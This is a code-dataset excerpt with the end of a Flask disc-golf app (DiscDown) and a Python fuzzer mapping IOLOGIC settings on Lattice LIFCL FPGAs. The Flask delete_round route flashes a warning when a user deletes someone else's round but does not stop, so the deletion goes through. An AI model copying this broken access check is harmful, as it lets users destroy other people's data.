Returns list of JSON objects\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': 'findname', 'name': name, 'sig': app.config['NAME_SEARCH_SIG']})\n if not res:\n return []\n return res.json()\n\n\ndef get_hole_info(course_id):\n \"\"\"search hole information for selected course. Returns json list of holes and information\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': \"holeinfo\", 'id': course_id, 'sig': app.config['HOLE_INFO_SIG']\n })\n if not res:\n return []\n return res.json()\n\n\ndef get_course_photo(course_id):\n \"\"\"retreive a course photo from the API. Returns URL\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': \"crsephto\", 'id': course_id, 'sig': app.config['PHOTO_SEARCH_SIG']\n })\n if not res:\n return None\n return res.json()['course_photo_url_medium']\n\n\ndef search_by_zip(zip):\n \"\"\"Searches API for course close to zip. Returns list of JSON objects\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': \"findzip\", 'zip': zip, 'sig': app.config['ZIP_SEARCH_SIG']\n })\n if not res:\n return []\n return res.json()\n\n\n@app.route('/')\ndef base():\n if g.user:\n return redirect('/home')\n return render_template('home.html')\n\n\n@app.route('/login', methods=[\"GET\", \"POST\"])\ndef login():\n \"\"\"Handles User Login\"\"\"\n\n form = LoginForm()\n if g.user:\n flash(\"Already logged in, log out to log in as different user\", \"warning\")\n return redirect('/')\n if form.validate_on_submit():\n user = User.authenticate(form.username.data,\n form.password.data)\n\n if user:\n user_login(user)\n flash(f\"Welcome back, {user.username}!\", \"success\")\n return redirect(\"/\")\n\n flash(\"Invalid login information\", \"danger\")\n\n return render_template('login.html', form=form)\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n \"\"\"page with form to register a new user\"\"\"\n form = RegisterForm()\n if g.user:\n flash(\"Already logged in, log out to register new user\", \"warning\")\n return redirect('/')\n\n if form.validate_on_submit():\n try:\n new_user = User.signup(\n username=form.username.data,\n first_name=form.first_name.data,\n last_name=form.last_name.data,\n email=form.email.data,\n password=form.password.data\n )\n db.session.commit()\n\n except:\n flash(\"Username or Email is already being used\", \"danger\")\n return render_template(\"register.html\", form=form)\n\n user_login(new_user)\n return redirect('/home')\n else:\n return render_template(\"register.html\", form=form)\n\n\n@app.route('/logout', methods=['POST'])\ndef logout_user():\n if not g.user:\n flash(\"Log in before you can log out!\", \"warning\")\n return redirect('/')\n user_logout()\n flash(\"Log out was successful!\", 'success')\n return redirect('/')\n\n\n@app.route('/home')\ndef home_page():\n \"\"\"landing page when the site is visited\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n rounds = UserRound.query.order_by(UserRound.date.desc()).all()\n\n return render_template('userhome.html', rounds=rounds)\n\n#######################################\n# Course Routes #\n\n\n@app.route('/course_details/')\ndef show_course_details(id):\n \"\"\"Shows details of chosen course\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n rounds = UserRound.query.filter(\n UserRound.course_id == 
id).order_by(UserRound.date.desc()).all()\n try:\n course = get_course_by_id(id)\n holes = get_hole_info(id)\n except:\n flash(\"An error occured, try again\", \"danger\")\n return redirect('/')\n return render_template('/course/course_home.html', course=course, rounds=rounds, holes=holes)\n\n\n# @app.route('/course_details//holes')\n# def show_hole_info(id):\n# if not g.user:\n# flash(\"Please Log in or Register!\", \"danger\")\n# return redirect('/')\n# course = get_course_by_id(id)\n# holes = get_hole_info(id)\n\n# return render_template('course/tee_info.html', holes=holes, course=course)\n\n\n####################################\n# User Routes #\n@app.route('/users/')\ndef show_user_details(id):\n \"\"\"shows a users details to another logged in user. If page is logged in users details, can be edited.\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n following = [f.id for f in user.following]\n following_rounds = (UserRound.query.filter(UserRound.user_id.in_(following))\n .order_by(UserRound.date.desc())\n .all())\n return render_template('/user/user_details.html', user=user, following_rounds=following_rounds)\n\n\n@app.route('/users//rounds')\ndef show_user_rounds(id):\n \"\"\"Show user page with most recent rounds\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n return render_template('/user/user_rounds.html', user=user)\n\n\n@app.route('/users//following')\ndef show_user_follows(id):\n \"\"\"Show user page with all followed users\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n return render_template('/user/following.html', user=user)\n\n\n@app.route('/users//followers')\ndef show_user_followers(id):\n \"\"\"Show user page with all followers\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n return render_template('/user/followers.html', user=user)\n\n\n@app.route('/users//following_rounds')\ndef show_following_rounds(id):\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n following = [f.id for f in user.following]\n following_rounds = (UserRound.query.filter(UserRound.user_id.in_(following))\n .order_by(UserRound.date.desc())\n .all())\n return render_template('user/following_rounds.html', user=user, following_rounds=following_rounds)\n\n\n@app.route('/users//edit', methods=['GET', 'POST'])\ndef edit_user(id):\n \"\"\"Shows edit user page and submits changes to the DB\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n if g.user.id != id:\n flash(\"Unautherized to edit user\", 'danger')\n return redirect('/')\n user = g.user\n form = EditUser(obj=user)\n if form.validate_on_submit():\n if User.authenticate(user.username, form.password.data):\n try:\n user.username = form.username.data\n user.first_name = form.first_name.data\n user.last_name = form.last_name.data\n user.email = form.email.data\n user.location = form.location.data\n user.bio = form.bio.data\n user.avatar = form.avatar.data\n user.fav_course = form.fav_course.data\n if user.fav_course:\n course = get_course_by_name(user.fav_course)\n if course:\n user.fav_course = course[0][\"name\"]\n db.session.commit()\n\n except (IntegrityError, InvalidRequestError, 
UniqueViolation):\n db.session.rollback()\n flash(\"Username or Email is already being used\", \"danger\")\n return render_template('user/edit_user.html', user=user, form=form)\n flash(\"Profile edited successfully!\", 'success')\n return redirect(f\"/users/{user.id}\")\n flash(\"Incorrect Password\", 'danger')\n return render_template('user/edit_user.html', user=user, form=form)\n else:\n return render_template('user/edit_user.html', user=user, form=form)\n\n\n@app.route('/users//delete', methods=['POST'])\ndef delete_user(id):\n \"\"\"Remove user\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n if user.id != g.user.id:\n flash(\"Can not delete another user\", \"danger\")\n return redirect('/')\n db.session.delete(user)\n db.session.commit()\n flash('User successfully removed', \"success\")\n return redirect('/')\n\n\n@app.route('/course_details//new_round', methods=['GET', 'POST'])\ndef add_new_round(id):\n \"\"\"Adding a new round\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n form = NewRound()\n user = g.user\n\n course = get_course_by_id(id)\n if form.validate_on_submit():\n date = form.date.data\n score = form.score.data\n notes = form.notes.data\n user_id = user.id\n\n new_round = UserRound(user_id=user.id, course_id=course['course_id'],\n course_name=course['name'], date=date, score=score, notes=notes)\n db.session.add(new_round)\n try:\n db.session.commit()\n except:\n flash('Something went wrong, try again', 'danger')\n return render_template('course/new_round.html', form=form)\n flash('Round added successfully', 'success')\n return redirect(f'/course_details/{id}')\n else:\n return render_template('course/new_round.html', form=form, user=user, course=course)\n\n\n@app.route(\"/users//follow\", methods=['POST'])\ndef follow_user(id):\n \"\"\"Adding user to followed users\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n if g.user.id == id:\n flash(\"Following yourself is a little vain, don't you think?\", \"warning\")\n return redirect('/')\n\n followed_user = User.query.get_or_404(id)\n followed_user.followers.append(g.user)\n db.session.commit()\n\n return redirect(f\"/users/{id}\")\n\n\n@app.route(\"/users//unfollow\", methods=['POST'])\ndef unfollow_user(id):\n \"\"\"removes user form followed user\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n if g.user.id == id:\n flash(\"Can't unfollow yourself, unfortunately\", \"warning\")\n return redirect('/')\n\n followed_user = User.query.get_or_404(id)\n followed_user.followers.remove(g.user)\n db.session.commit()\n\n return redirect(f\"/users/{id}\")\n\n\n@app.route(\"/round_info/\")\ndef show_round_info(id):\n \"\"\"Shows details from a specified round\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n d_round = UserRound.query.get_or_404(id)\n return render_template('round_info.html', round=d_round)\n\n\n###################################\n# Search Routes #\n\n@app.route('/course_search_name')\ndef search_course_by_name_results():\n \"\"\"Shows results of a search for courses by name.\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n\n search = request.args['course-name-input']\n courses = get_course_by_name(search)\n return render_template('/search/course_search_results.html', 
courses=courses)\n\n\n@app.route('/fav_course_search_name/')\ndef search_fav_course_by_name_results(fav):\n \"\"\"Shows results of a search for courses by from fav link\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n\n courses = get_course_by_name(fav)\n return render_template('/search/course_search_results.html', courses=courses)\n\n\n@app.route('/course_search_zip')\ndef search_course_by_zip_results():\n \"\"\"Shows results of a search for courses by zipcode.\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n\n search = request.args['course-zip']\n courses = search_by_zip(search)\n return render_template('/search/course_search_results.html', courses=courses)\n\n\n@app.route('/user_search')\ndef user_search_results():\n \"\"\"Shows results of a search for users by username.\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n\n search = request.args['user-username-input']\n users = User.query.filter(User.username.like(f\"%{search}%\")).all()\n return render_template('/search/user_search_results.html', users=users)\n\n\n########################################################################\n# API calls from the front end #\n\n@app.route('/delete_round/', methods=['DELETE'])\ndef delete_round(id):\n \"\"\"Deletes and removes round\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n dround = UserRound.query.get_or_404(id)\n if dround.user_id != g.user.id:\n flash(\"Cannot delete other users rounds\", \"danger\")\n db.session.delete(dround)\n db.session.commit()\n return jsonify()\n","repo_name":"namroc89/DiscDown","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36568374229","text":"from fuzzconfig import FuzzConfig\nimport nonrouting\nimport fuzzloops\nimport re\n\nconfigs = [\n\n # LIFCL-40 tiles\n (\"IOL_B8A\", \"IOLOGICA\", FuzzConfig(job=\"IOL5AMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C8:SYSIO_B5_0\", \"CIB_R56C9:SYSIO_B5_1\"])),\n (\"IOL_B8B\", \"IOLOGICB\", FuzzConfig(job=\"IOL5BMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C8:SYSIO_B5_0\", \"CIB_R56C9:SYSIO_B5_1\"])),\n (\"IOL_B18A\", \"IOLOGICA\", FuzzConfig(job=\"IOL4AMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C18:SYSIO_B4_0\", \"CIB_R56C19:SYSIO_B4_1\"])),\n (\"IOL_B18B\", \"IOLOGICB\", FuzzConfig(job=\"IOL4BMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C18:SYSIO_B4_0\", \"CIB_R56C19:SYSIO_B4_1\"])),\n (\"IOL_B56A\", \"IOLOGICA\", FuzzConfig(job=\"IOL3AMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C56:SYSIO_B3_0\", \"CIB_R56C57:SYSIO_B3_1\"])),\n (\"IOL_B56B\", \"IOLOGICB\", FuzzConfig(job=\"IOL3BMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R56C56:SYSIO_B3_0\", \"CIB_R56C57:SYSIO_B3_1\"])),\n\n (\"IOL_R32A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL2AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R32C87:SYSIO_B2_0_EVEN\"])),\n (\"IOL_R32B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL2BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R32C87:SYSIO_B2_0_EVEN\"])),\n (\"IOL_L32A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL6AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", 
tiles=[\"CIB_R32C0:SYSIO_B6_0_EVEN\"])),\n (\"IOL_L32B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL6BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R32C0:SYSIO_B6_0_EVEN\"])),\n (\"IOL_R13A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL1AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R13C87:SYSIO_B1_0_EVEN\"])),\n (\"IOL_R13B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL1BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R13C87:SYSIO_B1_0_EVEN\"])),\n (\"IOL_L6A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL7AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R6C0:SYSIO_B7_0_EVEN\"])),\n (\"IOL_L6B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL7BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R6C0:SYSIO_B7_0_EVEN\"])),\n\n (\"IOL_R34A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL2AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R34C87:SYSIO_B2_0_ODD\"])),\n (\"IOL_R34B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL2BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R34C87:SYSIO_B2_0_ODD\"])),\n (\"IOL_L34A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL6AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R34C0:SYSIO_B6_0_ODD\"])),\n (\"IOL_L34B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL6BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R34C0:SYSIO_B6_0_ODD\"])),\n (\"IOL_R15A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL1AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R15C87:SYSIO_B1_0_ODD\"])),\n (\"IOL_R15B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL1BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R15C87:SYSIO_B1_0_ODD\"])),\n (\"IOL_L8A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL7AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R8C0:SYSIO_B7_0_ODD\"])),\n (\"IOL_L8B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL7BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R8C0:SYSIO_B7_0_ODD\"])),\n\n (\"IOL_T76A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL0AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R0C76:SYSIO_B0_0_ODD\"])),\n (\"IOL_T76B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL0BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R0C76:SYSIO_B0_0_ODD\"])),\n\n (\"IOL_T78A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL0AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R0C78:SYSIO_B0_0_EVEN\"])),\n (\"IOL_T78B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL0BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R0C78:SYSIO_B0_0_EVEN\"])),\n\n (\"IOL_R46A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL2CMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R46C87:SYSIO_B2_0_C\", \"CIB_R47C87:SYSIO_B2_0_REM\"])),\n (\"IOL_R46B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL2DMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R46C87:SYSIO_B2_0_C\", \"CIB_R47C87:SYSIO_B2_0_REM\"])),\n (\"IOL_L46A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL6CMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R46C0:SYSIO_B6_0_C\", \"CIB_R47C0:SYSIO_B6_0_REM\"])),\n (\"IOL_L46B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL6DMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R46C0:SYSIO_B6_0_C\", \"CIB_R47C0:SYSIO_B6_0_REM\"])),\n (\"IOL_R10A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL1CMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R10C87:SYSIO_B1_0_C\", 
\"CIB_R11C87:SYSIO_B1_0_REM\"])),\n (\"IOL_R10B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL1DMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R10C87:SYSIO_B1_0_C\", \"CIB_R11C87:SYSIO_B1_0_REM\"])),\n (\"IOL_L10A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL7CMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R10C0:SYSIO_B7_0_C\", \"CIB_R11C0:SYSIO_B7_0_REM\"])),\n (\"IOL_L10B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL7DMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R10C0:SYSIO_B7_0_C\", \"CIB_R11C0:SYSIO_B7_0_REM\"])),\n\n (\"IOL_R3B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL3DEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R3C87:SYSIO_B1_DED\"])),\n\n # LIFCL-17 tiles\n (\"IOL_T57A\", \"SIOLOGICA\", FuzzConfig(job=\"IOLT57AMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R0C57:SYSIO_B0_0_15K\"])),\n (\"IOL_T57B\", \"SIOLOGICB\", FuzzConfig(job=\"IOLT57BMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R0C57:SYSIO_B0_0_15K\"])),\n\n (\"IOL_R3B\", \"SIOLOGICB\", FuzzConfig(job=\"IOLR3BMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R3C75:SYSIO_B1_DED_15K\", \"CIB_R4C75:PIC_B1_DED_15K\"])),\n\n (\"IOL_R5A\", \"SIOLOGICA\", FuzzConfig(job=\"IOLR5AMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R5C75:SYSIO_B1_0_15K\"])),\n (\"IOL_R5B\", \"SIOLOGICB\", FuzzConfig(job=\"IOLR5BMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R5C75:SYSIO_B1_0_15K\"])),\n\n # It appears that LIFCL-17 does not expose any pins from\n # - SYSIO_B1_1_15K\n]\n\ndef main():\n def per_config(x):\n site, prim, cfg = x\n cfg.setup()\n empty = cfg.build_design(cfg.sv, {})\n\n if cfg.device == \"LIFCL-40\":\n cfg.sv = \"iologic_40.v\"\n elif cfg.device == \"LIFCL-17\":\n cfg.sv = \"iologic_17.v\"\n else:\n assert False, cfg.device\n\n s = (prim[0] == \"S\")\n\n side = site[4]\n pos = int(site[5:-1])\n ab = site[-1]\n\n if cfg.device == \"LIFCL-40\":\n if side == \"L\":\n rc = \"R{}C{}\".format(pos, 0)\n elif side == \"R\":\n rc = \"R{}C{}\".format(pos, 87)\n elif side == \"B\":\n rc = \"R{}C{}\".format(56, pos)\n elif side == \"T\":\n rc = \"R{}C{}\".format(0, pos)\n elif cfg.device == \"LIFCL-17\":\n if side == \"L\":\n rc = \"R{}C{}\".format(pos, 0)\n elif side == \"R\":\n rc = \"R{}C{}\".format(pos, 75)\n elif side == \"B\":\n rc = \"R{}C{}\".format(29, pos)\n elif side == \"T\":\n rc = \"R{}C{}\".format(0, pos)\n else:\n assert False, cfg.device\n\n def get_substs(mode=\"NONE\", default_cfg=False, scope=None, kv=None, mux=False, glb=False, dqs=False, pinconn=\"\"):\n if default_cfg:\n config = \"SCLKINMUX:#OFF GSR:ENABLED INMUX:#OFF OUTMUX:#OFF DELAYMUX:#OFF SRMODE:#ASYNC LOAD_NMUX:#OFF DIRMUX:#OFF MOVEMUX:#OFF CEOUTMUX:#OFF CEINMUX:#OFF LSRINMUX:#OFF LSROUTMUX:#OFF STOP_EN:DISABLED\"\n elif kv is None:\n config = \"\"\n elif glb:\n config=\"{}:{}\".format(kv[0], kv[1])\n elif dqs and \"_\" in kv[1]:\n val, dqsmode = kv[1].split(\"_\")\n config = \"{}:::{}={} WRCLKMUX:{}\".format(mode if scope is None else scope, kv[0], val, dqsmode)\n elif mux:\n signame = kv[0].replace(\"MUX\", \"\")\n val = \"{}:::{}=#SIG\".format(signame, signame)\n if kv[1] in (\"0\", \"1\"):\n val = \"CONST:::CONST={}\".format(kv[1])\n if kv[1] == \"INV\":\n val = \"{}:::{}=#INV\".format(signame, signame)\n config = \"{}:{}\".format(kv[0], val)\n else:\n config = \"{}:::{}={}\".format(mode if scope is None else scope, kv[0], kv[1])\n if pinconn != \"\":\n # Add routing 
so that pin is 'used'\n if \"TOUT\" in pinconn:\n if side in (\"L\", \"R\", \"T\"):\n first_wire = \"{}_JTOUT_SIOLOGIC_CORE_IBASE_PIC_{}\".format(rc, ab)\n second_wire = \"{}_JPADDT_SEIO33_CORE_IO{}\".format(rc, ab)\n else:\n first_wire = \"{}_JTOUT_IOLOGIC_CORE_I_GEARING_PIC_TOP_{}\".format(rc, ab)\n if ab == \"A\":\n second_wire = \"{}_JPADDT_DIFFIO18_CORE_IO{}\".format(rc, ab)\n else:\n second_wire = \"{}_JPADDT_SEIO18_CORE_IO{}\".format(rc, ab)\n else:\n if side in (\"L\", \"R\", \"T\"):\n first_wire = \"{}_JDOUT_SIOLOGIC_CORE_IBASE_PIC_{}\".format(rc, ab)\n second_wire = \"{}_JPADDO_SEIO33_CORE_IO{}\".format(rc, ab)\n else:\n first_wire = \"{}_JDOUT_IOLOGIC_CORE_I_GEARING_PIC_TOP_{}\".format(rc, ab)\n if ab == \"A\":\n second_wire = \"{}_JPADDO_DIFFIO18_CORE_IO{}\".format(rc, ab)\n else:\n second_wire = \"{}_JPADDO_SEIO18_CORE_IO{}\".format(rc, ab)\n route = '(* \\\\xref:LOG =\"q_c@0@9\", \\\\dm:arcs =\"{}.{}\" *) '.format(second_wire, first_wire)\n sig = route + \"wire sig;\"\n else:\n sig = \"\"\n return dict(mode=mode, cmt=\"//\" if mode == \"NONE\" else \"\", config=config, site=site, s=\"S\" if s else \"\", pinconn=pinconn, sig=sig)\n modes = [\"NONE\", \"IREG_OREG\", \"IDDRX1_ODDRX1\"]\n if not s:\n modes += [\"IDDRXN\", \"ODDRXN\", \"MIDDRXN_MODDRXN\"]\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MODE\".format(prim), modes,\n lambda x: get_substs(x, default_cfg=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.GSR\".format(prim), [\"ENABLED\", \"DISABLED\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"GSR\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.SRMODE\".format(prim), [\"ASYNC\", \"LSR_OVER_CE\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"SRMODE\", x), glb=True), False)\n if not s:\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IDDRXN.DDRMODE\".format(prim), [\"NONE\", \"IDDRX2\", \"IDDR71\", \"IDDRX4\", \"IDDRX5\"],\n lambda x: get_substs(mode=\"IDDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x)), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.ODDRXN.DDRMODE\".format(prim), [\"NONE\", \"ODDRX2\", \"ODDR71\", \"ODDRX4\", \"ODDRX5\"],\n lambda x: get_substs(mode=\"ODDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x)), False)\n\n for sig in (\"SCLKIN\", \"SCLKOUT\", \"CEIN\", \"CEOUT\", \"LSRIN\", \"LSROUT\"):\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.{}MUX\".format(prim, sig), [\"1\" if sig[0:2] == \"CE\" else \"0\", sig, \"INV\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"{}MUX\".format(sig), x), mux=True), False)\n\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IDDRX1_ODDRX1.OUTPUT\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IDDRX1_ODDRX1\", default_cfg=True, pinconn=(\".DOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IREG_OREG.OUTPUT\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IREG_OREG\", default_cfg=True, pinconn=(\".DOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n\n if not s:\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IDDRX1_ODDRX1.TRISTATE\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IDDRX1_ODDRX1\", kv=(\"TOUTMUX\", \"TSREG\"), glb=True, pinconn=(\".TOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IREG_OREG.TRISTATE\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"TOUTMUX\", \"TSREG\"), 
glb=True, pinconn=(\".TOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n else:\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IDDRX1_ODDRX1.TRISTATE\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IDDRX1_ODDRX1\", default_cfg=True, pinconn=(\".TOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IREG_OREG.TRISTATE\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IREG_OREG\", default_cfg=True, pinconn=(\".TOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.INMUX\".format(prim), [\"BYPASS\", \"DELAY\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"INMUX\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.OUTMUX\".format(prim), [\"BYPASS\", \"DELAY\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"OUTMUX\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.DELAYMUX\".format(prim), [\"OUT_REG\", \"IN\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"DELAYMUX\", x), glb=True), False)\n\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MOVEMUX\".format(prim), [\"0\", \"MOVE\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"MOVEMUX\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.DIRMUX\".format(prim), [\"0\", \"DIR\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"DIRMUX\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.LOAD_NMUX\".format(prim), [\"1\", \"LOAD_N\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"LOAD_NMUX\", x), glb=True), False)\n\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.INREG.REGSET\".format(prim), [\"SET\", \"RESET\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"REGSET\", x), scope=\"INREG\"), False)\n 